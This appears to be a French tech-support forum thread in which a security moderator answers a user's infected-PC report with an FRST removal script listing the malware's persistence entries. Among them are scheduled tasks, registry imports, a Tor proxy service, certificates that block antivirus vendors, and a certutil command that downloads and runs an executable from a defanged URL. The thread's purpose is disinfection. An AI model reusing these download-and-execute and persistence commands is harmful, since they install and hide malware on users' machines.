PC infécté

Résolu

saidclecde Messages postés 4 Date d'inscription Statut Membre Dernière intervention -
Malekal_morte- Messages postés 180304 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention - 4 juin 2018 à 11:49

bonsoir,

Mon Pc est très infecté, j'ai fait un scan par ZHPDIAG,

Voila le rapport : https://www.cjoint.com/c/HFcxnvOoHj7

En plus voila les rapport générés par FRST64

FRST: https://www.cjoint.com/c/HFcx1IyLCa7
Addition : https://www.cjoint.com/c/HFcx2pSjHH7

Merci

Afficher la suite

A voir également:

PC infécté
Reinitialiser pc - Guide
Test performance pc - Guide
Pc lent - Guide
Downloader for pc - Télécharger - Téléchargement & Transfert
Forcer demarrage pc - Guide

3 réponses

Réponse 1 / 3

Malekal_morte- Messages postés 180304 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention 24 685

Salut,

Les joies de téléchargement de cracks...
Vu l'ampleur, tu ferais mieux de réinitialiser Windows 10 : comment réinitialiser Windows 10.

Sinon, on peut tenter de désinfecter ..... :

Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.

CreateRestorePoint:
CloseProcesses:
Task: {0E8B2C56-528C-4945-BB6B-F1F0489A2658} - System32\Tasks\Online Application V2G4 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: {124B9B29-B301-4BB9-8FEF-5B9DA72F02FE} - System32\Tasks\RuvZlWnxKNkmGuM2 => rundll32 "C:\Program Files (x86)\KCGHGVOnU\arGmRu.dll",#1
Task: {14C243B6-F63D-4EBB-B922-F9E7A98E93F8} - System32\Tasks\psv_Sailcore => cmd.exe /c regedit.exe /s "C:\ProgramData\Voyasollam\Blueflex.reg" & del "C:\ProgramData\Voyasollam\Blueflex.reg" & SCHTASKS /Delete /TN "psv_Sailcore" /F <==== ATTENTION
Task: {184DFF65-5562-436A-BBC1-6D1B3A704D95} - System32\Tasks\psv_GeoSailfax => cmd.exe /c regedit.exe /s "C:\ProgramData\Voyasollam\Tempotnix.reg" & del "C:\ProgramData\Voyasollam\Tempotnix.reg" & SCHTASKS /Delete /TN "psv_GeoSailfax" /F <==== ATTENTION
Task: {217F1DD6-FB2C-40C0-AA0A-AB4B1B094ECD} - System32\Tasks\KnPQHVchzdGfrlHaz2 => rundll32 "C:\Program Files (x86)\OxoywZINBbQwrioRGrR\EZomjhb.dll",#1
Task: {23DC4AC2-D7E0-464B-A54C-D01A748D95A2} - System32\Tasks\Online Application V2G1 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: {298639F9-958A-412D-93BC-0DFBCF1F5E68} - System32\Tasks\wAJDAAZgOBCdyQgsK2 => rundll32 "C:\Program Files (x86)\VfXyqasRzlGpJFtgwyR\KIWKmbE.dll",#1
Task: {2BB4F419-83CC-4C8E-9B17-30DD03213B44} - System32\Tasks\IP Relub => C:\WINDOWS\system32\rundll32.exe "C:\Program Files\IP Relub\IP Relub.dll",tNHiHMuCjemR <==== ATTENTION
Task: {2E39416B-8542-4870-A25C-08BE631A36DF} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.14.17639.18041-0\MpCmdRun.exe [2018-04-26] (Microsoft Corporation)
Task: {3481D7F0-4DEC-43BC-B2DC-0AC8C7F143AC} - System32\Tasks\psv_ZoomEco => cmd.exe /c regedit.exe /s "C:\ProgramData\Subair\Matphase.reg" & del "C:\ProgramData\Subair\Matphase.reg" & SCHTASKS /Delete /TN "psv_ZoomEco" /F <==== ATTENTION
Task: {4244D09C-E4EC-4F2D-9B86-08B899721340} - System32\Tasks\Online Application V2G3 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: {4C32DD45-9B88-43FB-A121-E846A3C36741} - System32\Tasks\psv_Solo-Stock => cmd.exe /c regedit.exe /s "C:\ProgramData\Subair\RanJob.reg" & del "C:\ProgramData\Subair\RanJob.reg" & SCHTASKS /Delete /TN "psv_Solo-Stock" /F <==== ATTENTION
R2 TCPSvc; "C:\Users\2s\AppData\Local\Temp\csrss\proxy\tor.exe" --nt-service -f "C:\Users\2s\AppData\Local\Temp\csrss\proxy\config" --Log "notice file C:\Users\2s\AppData\Local\Temp\csrss\proxy\t" <==== ATTENTION
S2 Voyasollam; C:\ProgramData\\Voyasollam\\Voyasollam.exe shuz -f "C:\ProgramData\\Voyasollam\\Voyasollam.dat" -l -a
R2 ZAMSvc; C:\Program Files (x86)\MalwareFox AntiMalware\ZAM.exe [15767792 2018-05-24] (Copyright 2017.)
S2 saiyitechnology; C:\ProgramData\yahoochrome_D\desktop245.exe [517432 2018-05-21] (PandaViewer)
R2 PDF24; C:\Program Files (x86)\PDF24\pdf24.exe [218248 2016-11-15] (Geek Software GmbH)
Task: {4D47D321-6F4D-45E5-BB4E-AF32EC95D150} - System32\Tasks\Online Application V2G5 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: {4FBA52DD-AF42-4843-9B70-E96CDC034E78} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2012-10-01] (Microsoft Corporation)
Task: {54DC5A95-C460-4DDF-A623-A90AA916334D} - System32\Tasks\rArHIXNWKfbeRtR2 => rundll32 "C:\Program Files (x86)\EgDGbQEiU\mNcAyB.dll",#1
Task: {5D643E51-495D-4418-88F1-86DAA772BCB1} - System32\Tasks\csrss => C:\WINDOWS\rss\csrss.exe [2018-05-24] () <==== ATTENTION
Task: {5FD2DA35-7BDC-41A4-9B6F-5DB4554BDEAA} - System32\Tasks\Microsoft\Windows\Setup\EOSNotify => C:\WINDOWS\system32\EOSNotify.exe
Task: {60A721D3-0B62-470B-B840-FFF528DB135C} - System32\Tasks\jbDyCmJOWCzWzi => rundll32 "C:\Program Files (x86)\EPVqpVJyVSWU2\SakrLGEmTRZuK.dll",#1
Task: {61784FEE-4B60-4356-AA82-A1984791B93D} - System32\Tasks\TdqeVjasHzsikvrWtEm2 => rundll32 "C:\Program Files (x86)\wCCFxMJCsZmzC\ClHKBUk.dll",#1
Task: {A352E386-05D2-4ADC-A152-309444E9479D} - System32\Tasks\psv_JobGocof => cmd.exe /c regedit.exe /s "C:\ProgramData\Voyasollam\Duodox.reg" & del "C:\ProgramData\Voyasollam\Duodox.reg" & SCHTASKS /Delete /TN "psv_JobGocof" /F <==== ATTENTION
Task: {BAFE10EA-7284-4529-B67C-67005EC6394F} - \FastDataX Task -> Pas de fichier <==== ATTENTION
Task: {BEA2DD67-BB47-489A-8D48-1DE709CBF7F5} - System32\Tasks\psv_TresDancof => cmd.exe /c regedit.exe /s "C:\ProgramData\Subair\Vaiatom.reg" & del "C:\ProgramData\Subair\Vaiatom.reg" & SCHTASKS /Delete /TN "psv_TresDancof" /F <==== ATTENTION
Task: {C45E16FE-8ED9-4B3F-99C9-CA2B42FAC904} - System32\Tasks\psv_FreshRemtax => cmd.exe /c regedit.exe /s "C:\ProgramData\Subair\Xxx-lax.reg" & del "C:\ProgramData\Subair\Xxx-lax.reg" & SCHTASKS /Delete /TN "psv_FreshRemtax" /F <==== ATTENTION
Task: {C5A4DD32-4C84-485A-A6CC-92991A4EFD8E} - System32\Tasks\TUZwhpCbnzWcBoUhWSI2 => rundll32 "C:\Program Files (x86)\SvnSzzIscGyUC\PzsFxQr.dll",#1
Task: {C628122E-598C-4A56-94E8-301E43055366} - \ReimageUpdater -> Pas de fichier <==== ATTENTION
Task: {C6A04AF6-6652-4F3E-B043-B0FCAC0F17EE} - System32\Tasks\psv_FixSing => cmd.exe /c regedit.exe /s "C:\ProgramData\Voyasollam\TechOveeco.reg" & del "C:\ProgramData\Voyasollam\TechOveeco.reg" & SCHTASKS /Delete /TN "psv_FixSing" /F <==== ATTENTION
Task: {C7E9B9E5-7022-4F87-BB31-D933E65232DD} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/4/app.exe C:\Users\2s\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\2s\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {DD27E196-CB64-4839-AE0B-1C77E6B0DF51} - System32\Tasks\XLqsfoKFUKuTqG => rundll32 "C:\Program Files (x86)\ijcQGTqqPStU2\VmANycSAtyYBS.dll",#1
Task: {DF3C198D-B30D-45AD-8584-AAFB8B881A21} - System32\Tasks\Online Application V2G2 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: {DFEC916E-0BE3-4D71-B4F3-D698BBBD67BA} - System32\Tasks\Online Application V2G6 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: {E9FFBC4A-6E3B-4009-9536-2CFDCED7DDDF} - System32\Tasks\psv_ZumApron => cmd.exe /c regedit.exe /s "C:\ProgramData\Subair\OverSanfix.reg" & del "C:\ProgramData\Subair\OverSanfix.reg" & SCHTASKS /Delete /TN "psv_ZumApron" /F <==== ATTENTION
Task: {EBBD806D-C2EE-4C13-872B-84B138CA783D} - System32\Tasks\Updater_Online_Application => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe <==== ATTENTION
Task: {EC92AAEA-6472-49BB-8C13-A08C4A03BA48} - System32\Tasks\psv_Scot-Lam => cmd.exe /c regedit.exe /s "C:\ProgramData\Voyasollam\Subsonkix.reg" & del "C:\ProgramData\Voyasollam\Subsonkix.reg" & SCHTASKS /Delete /TN "psv_Scot-Lam" /F <==== ATTENTION
Task: {F53ED0B5-E862-432F-A8D7-5A473438B4AD} - System32\Tasks\WobUIKhuMtTTi2 => C:\WINDOWS\system32\wscript.exe "C:\ProgramData\XjOPTLXDzAynQaVB\WGVYbGg.wsf"
Task: {F9A5FEF7-2409-4967-B010-E3827FE969B1} - System32\Tasks\ImpoperViewer => C:\WINDOWS\system32\rundll32.exe "C:\Program Files\ImpoperViewer\ImpoperViewer.dll",TSuwoSt <==== ATTENTION
HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== ATTENTION
HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== ATTENTION
HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ATTENTION
HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== ATTENTION
HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ATTENTION
HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ATTENTION
HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== ATTENTION
HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== ATTENTION
HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ATTENTION
HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== ATTENTION
HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ATTENTION
HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== ATTENTION
HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) <==== ATTENTION
HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ATTENTION
HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== ATTENTION
HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== ATTENTION
HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== ATTENTION
HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== ATTENTION
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1591057960-2417521308-250896843-1002\...\Run: [BillowingWind] => C:\WINDOWS\rss\csrss.exe [3189248 2018-05-24] () <==== ATTENTION
HKU\S-1-5-21-1591057960-2417521308-250896843-1002\...\Run: [A1DADOPPE8F6HAO] => "C:\Program Files\GMWX1Q6NX4\GMWX1Q6NX.exe"
HKU\S-1-5-21-1591057960-2417521308-250896843-1002\...\Run: [CloudNet] => C:\Users\2s\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [680960 2018-06-02] (EpicNet Inc.)
HKU\S-1-5-21-1591057960-2417521308-250896843-1002\...\Policies\Explorer: [] 
HKU\S-1-5-21-1591057960-2417521308-250896843-1002\...\MountPoints2: {68f97705-51f3-11e8-9d02-9822ef1caefe} - "D:\Setup.exe" /s
AppInit_DLLs: C:\ProgramData\Subair\Zamtough.dll => Pas de fichier
AppInit_DLLs-x32: C:\ProgramData\Subair\Matcom.dll => Pas de fichier
2018-06-02 21:29 - 2018-06-02 21:29 - 000072816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\jesqkqqi.sys
2018-06-02 21:22 - 2018-06-02 21:27 - 008206624 _____ (Malwarebytes) C:\Users\2s\Desktop\adwcleaner-7-0-7-0.exe
2018-06-02 21:12 - 2018-06-02 21:12 - 000000000 ____D C:\Users\2s\AppData\Local\ElevatedDiagnostics
2018-06-02 21:11 - 2018-06-02 21:11 - 000072816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wccmctpk.sys
2018-06-02 21:08 - 2018-06-02 21:08 - 000072816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wivzpefe.sys
2018-06-02 21:04 - 2018-06-02 21:04 - 000072816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hzmsqsbe.sys
2018-06-02 18:05 - 2018-06-02 18:05 - 000000000 ____D C:\Program Files (x86)\ATF_Cleaner
2018-06-02 17:42 - 2018-06-02 17:42 - 000003212 _____ C:\WINDOWS\System32\Tasks\XLqsfoKFUKuTqG
2018-06-02 17:42 - 2018-06-02 17:42 - 000003044 _____ C:\WINDOWS\System32\Tasks\WobUIKhuMtTTi2
2018-06-02 17:42 - 2018-06-02 17:42 - 000003034 _____ C:\WINDOWS\System32\Tasks\KnPQHVchzdGfrlHaz2
2018-06-02 17:42 - 2018-06-02 17:42 - 000003026 _____ C:\WINDOWS\System32\Tasks\TdqeVjasHzsikvrWtEm2
2018-06-02 17:42 - 2018-06-02 17:42 - 000003008 _____ C:\WINDOWS\System32\Tasks\rArHIXNWKfbeRtR2
2018-06-02 17:42 - 2018-06-02 17:42 - 000000000 ____D C:\ProgramData\XjOPTLXDzAynQaVB
2018-06-02 17:42 - 2018-06-02 17:42 - 000000000 ____D C:\Program Files (x86)\wCCFxMJCsZmzC
2018-06-02 17:42 - 2018-06-02 17:42 - 000000000 ____D C:\Program Files (x86)\OxoywZINBbQwrioRGrR
2018-06-02 17:42 - 2018-06-02 17:42 - 000000000 ____D C:\Program Files (x86)\lJFUJMGEHIE
2018-06-02 17:42 - 2018-06-02 17:42 - 000000000 ____D C:\Program Files (x86)\iRmKFyAZyPUn
2018-06-02 17:42 - 2018-06-02 17:42 - 000000000 ____D C:\Program Files (x86)\ijcQGTqqPStU2
2018-06-02 17:41 - 2018-06-02 20:59 - 000000000 ____D C:\Users\2s\AppData\Roaming\gpbxpbqxmdw
2018-06-02 17:41 - 2018-06-02 17:42 - 000000000 ____D C:\Program Files (x86)\EgDGbQEiU
2018-06-02 17:41 - 2018-06-02 17:41 - 000000000 ____D C:\Program Files\YTZTX5HWMR
2018-06-02 17:05 - 2018-06-02 20:59 - 000000000 ____D C:\Users\2s\AppData\Roaming\uziyf0umul5
2018-06-02 17:05 - 2018-06-02 18:31 - 000000000 ____D C:\Program Files\FH98R5I5YJ
2018-06-02 16:42 - 2018-06-02 20:59 - 000000000 ____D C:\Users\2s\AppData\Roaming\raj0v241spm
2018-06-02 16:42 - 2018-06-02 18:31 - 000000000 ____D C:\Program Files\8Z4GUCKJPK
2018-05-27 14:07 - 2018-05-27 14:07 - 000000000 ____D C:\ProgramData\Microsoft Toolkit
2018-05-27 14:06 - 2018-05-27 14:06 - 000004857 _____ C:\Users\2s\Desktop\MTKV263.zip
2018-05-25 06:20 - 2018-05-25 06:21 - 000366912 _____ C:\Users\2s\Desktop\Devis de prestation de service (Pour Elexpert) (1).pdf
2018-05-25 01:34 - 2018-05-25 01:57 - 000000000 ____D C:\WINDOWS\system32\appmgmt
2018-05-24 23:32 - 2018-06-02 18:17 - 000000000 ____D C:\Program Files\IDFYG9HHO5
2018-05-24 22:48 - 2018-06-02 18:17 - 000000000 ____D C:\Program Files\6Y39LUKVBJ
2018-05-24 22:34 - 2018-05-24 22:34 - 000002414 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2018-05-24 22:13 - 2018-05-24 22:13 - 000003588 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2018-05-24 22:13 - 2018-05-24 22:13 - 000003464 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2018-05-24 22:10 - 2018-05-24 22:13 - 000000000 ____D C:\Users\2s\AppData\Local\Deployment
2018-05-24 22:10 - 2018-05-24 22:10 - 000000000 ____D C:\Users\2s\AppData\Local\Apps\2.0
2018-05-24 22:08 - 2018-06-02 16:44 - 000000000 ____D C:\Program Files (x86)\JAcqddADqIE
2018-05-24 22:08 - 2018-06-02 16:38 - 000000000 ____D C:\Program Files (x86)\NExnNAYCpUUn
2018-05-24 22:08 - 2018-05-24 22:08 - 000000000 ____D C:\Program Files (x86)\VfXyqasRzlGpJFtgwyR
2018-05-24 22:08 - 2018-05-24 22:08 - 000000000 ____D C:\Program Files (x86)\SvnSzzIscGyUC
2018-05-24 22:08 - 2018-05-24 22:08 - 000000000 ____D C:\Program Files (x86)\EPVqpVJyVSWU2
2018-05-24 22:07 - 2018-05-24 22:08 - 000000000 ____D C:\Program Files (x86)\KCGHGVOnU
2018-05-24 22:05 - 2018-03-24 14:51 - 002990080 _____ C:\WINDOWS\system32\mcicda64.dll
2018-05-24 22:03 - 2018-06-02 20:59 - 000000000 ____D C:\Users\2s\AppData\Roaming\2pqqlm5b2kp
2018-05-24 21:54 - 2018-06-02 20:59 - 000000000 ____D C:\Users\2s\AppData\Roaming\r5dqdoik5wr
2018-05-24 21:44 - 2018-05-24 22:08 - 000003034 _____ C:\WINDOWS\System32\Tasks\wAJDAAZgOBCdyQgsK2
2018-05-24 21:44 - 2018-05-24 22:08 - 000003026 _____ C:\WINDOWS\System32\Tasks\TUZwhpCbnzWcBoUhWSI2
2018-05-24 21:42 - 2018-06-02 16:38 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MalwareFox AntiMalware
2018-05-24 21:36 - 2018-06-02 21:43 - 000406048 _____ C:\WINDOWS\ZAM.krnl.trace
2018-05-24 21:36 - 2018-06-02 21:43 - 000085779 _____ C:\WINDOWS\ZAM_Guard.krnl.trace
2018-05-24 21:36 - 2018-06-02 16:38 - 000000000 ____D C:\Program Files (x86)\MalwareFox AntiMalware
2018-05-24 21:36 - 2018-05-24 21:36 - 000203680 _____ (Zemana Ltd.) C:\WINDOWS\system32\Drivers\zamguard64.sys
2018-05-24 21:36 - 2018-05-24 21:36 - 000203680 _____ (Zemana Ltd.) C:\WINDOWS\system32\Drivers\zam64.sys
2018-05-24 21:36 - 2018-05-24 21:36 - 000000000 ____D C:\Users\2s\AppData\Local\Zemana
2018-05-24 21:36 - 2018-05-24 21:36 - 000000000 ____D C:\Users\2s\AppData\Local\Wolf of Webstreet OPC Private Limited
2018-05-24 21:09 - 2018-06-02 18:28 - 000000000 ____D C:\Users\2s\AppData\Roaming\qyxavgbtyty
2018-05-24 20:23 - 2018-06-02 20:59 - 000000000 ____D C:\Users\2s\AppData\Roaming\ffhddztanil
2018-05-24 19:20 - 2018-05-24 19:20 - 000016790 _____ C:\WINDOWS\System32\Tasks\IP Relub
2018-05-24 18:08 - 2018-05-24 18:08 - 000000000 _____ C:\autoexec.bat
2018-05-24 17:44 - 2018-05-24 17:44 - 000000000 ____D C:\Users\2s\AppData\Roaming\SystemHealer
2018-05-24 17:39 - 2018-06-02 16:38 - 000000000 ____D C:\Program Files (x86)\FastDataX
2018-05-24 17:38 - 2018-05-24 17:38 - 000000000 ____D C:\Users\2s\AppData\Roaming\FastDataX
2018-05-24 17:37 - 2018-06-02 20:59 - 000000000 ____D C:\Users\2s\AppData\Roaming\3nk4x03n5t3
2018-05-24 17:18 - 2018-05-24 17:18 - 000000000 ____D C:\Users\2s\AppData\Roaming\Macromedia
2018-05-24 15:54 - 2018-05-24 15:54 - 000016810 _____ C:\WINDOWS\System32\Tasks\ImpoperViewer
2018-05-24 15:46 - 2018-05-24 22:08 - 000003212 _____ C:\WINDOWS\System32\Tasks\jbDyCmJOWCzWzi
2018-05-24 15:46 - 2018-05-24 22:08 - 000003008 _____ C:\WINDOWS\System32\Tasks\RuvZlWnxKNkmGuM2
2018-05-24 15:37 - 2018-06-02 20:59 - 000000000 ____D C:\Users\2s\AppData\Roaming\0hzygrghqs2
2018-05-24 14:49 - 2018-06-02 20:59 - 000000000 ____D C:\Users\2s\AppData\Roaming\ftwdngd03dc
2018-05-24 14:04 - 2018-06-02 20:59 - 000000000 ____D C:\Users\2s\AppData\Roaming\mwugkltykxi
2018-05-24 02:47 - 2018-05-24 02:47 - 000000290 __RSH C:\Users\2s\ntuser.pol
2018-05-24 02:42 - 2018-06-02 21:03 - 000006040 __RSH C:\ProgramData\ntuser.pol
2018-05-24 02:33 - 2018-06-02 20:59 - 000000000 ____D C:\Users\2s\AppData\Roaming\rncxnmqbgrj
2018-05-24 02:28 - 2018-05-24 02:28 - 000003346 _____ C:\WINDOWS\System32\Tasks\psv_FixSing
2018-05-24 02:28 - 2018-05-24 02:28 - 000003342 _____ C:\WINDOWS\System32\Tasks\psv_Sailcore
2018-05-24 02:28 - 2018-05-24 02:28 - 000000000 ____D C:\Users\2s\AppData\Roaming\Mozilla
2018-05-24 02:27 - 2018-05-24 02:27 - 001987661 _____ C:\Users\2s\AppData\Local\Tampzap.tst
2018-05-24 02:27 - 2018-05-24 02:27 - 001895383 _____ C:\Users\2s\AppData\Local\Bamplus.bin
2018-05-24 02:27 - 2018-05-24 02:27 - 000003354 _____ C:\WINDOWS\System32\Tasks\psv_GeoSailfax
2018-05-24 02:27 - 2018-05-24 02:27 - 000003346 _____ C:\WINDOWS\System32\Tasks\psv_Scot-Lam
2018-05-24 02:27 - 2018-05-24 02:27 - 000003334 _____ C:\WINDOWS\System32\Tasks\psv_JobGocof
2018-05-24 02:27 - 2018-05-24 02:27 - 000000000 ____D C:\ProgramData\Voyasollams
2018-05-24 02:26 - 2018-05-24 02:26 - 000278510 _____ C:\Users\2s\AppData\Local\Grave-Com.bin
2018-05-24 02:26 - 2018-05-24 02:24 - 002136576 _____ (TODO: <Company name>) C:\Users\2s\AppData\Local\Tampzap.exe
2018-05-24 02:25 - 2018-06-02 20:59 - 000000000 ____D C:\Users\2s\AppData\Local\XService
2018-05-24 02:25 - 2018-05-24 02:25 - 003451904 ____H C:\WINDOWS\windefender.exe
2018-05-24 02:23 - 2018-06-02 20:59 - 000000000 ____D C:\Users\2s\AppData\Roaming\b1r11f5cjuf
2018-05-24 02:10 - 2018-05-24 17:17 - 000000000 ____D C:\Users\2s\AppData\LocalLow\iAiaDuTGfHtGg
2018-05-24 01:51 - 2018-05-24 01:51 - 000003334 _____ C:\WINDOWS\System32\Tasks\psv_ZumApron
2018-05-24 01:51 - 2018-05-24 01:51 - 000003330 _____ C:\WINDOWS\System32\Tasks\psv_TresDancof
2018-05-24 01:50 - 2018-05-24 01:50 - 000000000 ____D C:\Users\2s\AppData\Roaming\jw4ivehcxcm
2018-05-24 01:49 - 2018-06-02 16:38 - 000000000 ____D C:\Users\2s\AppData\Roaming\EpicNet Inc
2018-05-24 01:47 - 2018-06-02 18:22 - 000000000 ____D C:\Program Files (x86)\trs
2018-05-24 01:47 - 2018-05-24 01:47 - 000003334 _____ C:\WINDOWS\System32\Tasks\psv_FreshRemtax
2018-05-24 01:47 - 2018-05-24 01:47 - 000003326 _____ C:\WINDOWS\System32\Tasks\psv_Solo-Stock
2018-05-24 01:47 - 2018-05-24 01:47 - 000003322 _____ C:\WINDOWS\System32\Tasks\psv_ZoomEco
2018-05-24 01:46 - 2018-06-02 16:38 - 000000000 ____D C:\Users\2s\AppData\Roaming\WidModule
2018-05-24 01:46 - 2018-05-24 02:27 - 000126464 _____ C:\Users\2s\AppData\Local\noah.dat
2018-05-24 01:46 - 2018-05-24 02:27 - 000070896 _____ C:\Users\2s\AppData\Local\Config.xml
2018-05-24 01:46 - 2018-05-24 02:27 - 000018432 _____ C:\Users\2s\AppData\Local\Main.dat
2018-05-24 01:46 - 2018-05-24 02:27 - 000005568 _____ C:\Users\2s\AppData\Local\md.xml
2018-05-24 01:46 - 2018-05-24 01:46 - 001987661 _____ C:\Users\2s\AppData\Local\Dongtom.tst
2018-05-24 01:45 - 2018-05-24 22:05 - 000003650 _____ C:\WINDOWS\System32\Tasks\CreateExplorerShellUnelevatedTask
2018-05-24 01:45 - 2018-05-24 01:45 - 000000000 ____D C:\Program Files\My Program
